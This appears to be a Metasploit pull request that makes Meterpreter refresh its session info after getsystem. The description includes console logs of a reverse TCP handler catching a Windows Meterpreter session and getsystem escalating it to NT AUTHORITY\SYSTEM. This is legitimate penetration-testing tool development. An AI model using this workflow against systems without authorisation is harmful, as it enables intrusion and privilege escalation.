### PR TITLE
Meterpreter getsystem update session info

### DIFF
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -68,6 +68,7 @@ class Priv < Extension
 
     if( response.result == 0 and technique != nil )
       client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
+      client.update_session_info
       client.sys.config.getprivs
       if client.framework.db and client.framework.db.active
         client.framework.db.report_note(


### PR DESCRIPTION
This is a small change that updates the session info when getsystem in Meterpreter is successful.

## Verification

- [x] Start `msfconsole`
- [x] Gain a Windows shell on admin user that's not NT AUTHORITY\SYSTEM
- [x] `sessions -l`, confirm user is not NT AUTHORITY\SYSTEM
- [x] `sessions -i [session_id]`
- [x] `getsystem`
- [x] `background`
- [x] `sessions -l`, confirm user is now displayed as NT AUTHORITY\SYSTEM

## Current behavior

```
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.10.146:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (957487 bytes) to 192.168.10.135
[*] Meterpreter session 3 opened (192.168.10.146:4444 -> 192.168.10.135:59577) at 2017-05-26 14:11:07 -0600

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  3   meterpreter x86/windows  DESKTOP-C7F0FR8\me @ DESKTOP-C7F0FR8  192.168.10.146:4444 -> 192.168.10.135:59577 (192.168.10.135)

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: DESKTOP-C7F0FR8\me
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background 
[*] Backgrounding session 3...
msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  3   meterpreter x86/windows  DESKTOP-C7F0FR8\me @ DESKTOP-C7F0FR8  192.168.10.146:4444 -> 192.168.10.135:59577 (192.168.10.135)


```
## New behavior

```
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.10.146:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (957487 bytes) to 192.168.10.135
[*] Meterpreter session 2 opened (192.168.10.146:4444 -> 192.168.10.135:49216) at 2017-05-26 17:11:00 -0600

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  2   meterpreter x86/windows  DESKTOP-C7F0FR8\me @ DESKTOP-C7F0FR8  192.168.10.146:4444 -> 192.168.10.135:49216 (192.168.10.135)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: DESKTOP-C7F0FR8\me
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                     Information                            Connection
  --  ----                     -----------                            ----------
  2   meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-C7F0FR8  192.168.10.146:4444 -> 192.168.10.135:49216 (192.168.10.135)


```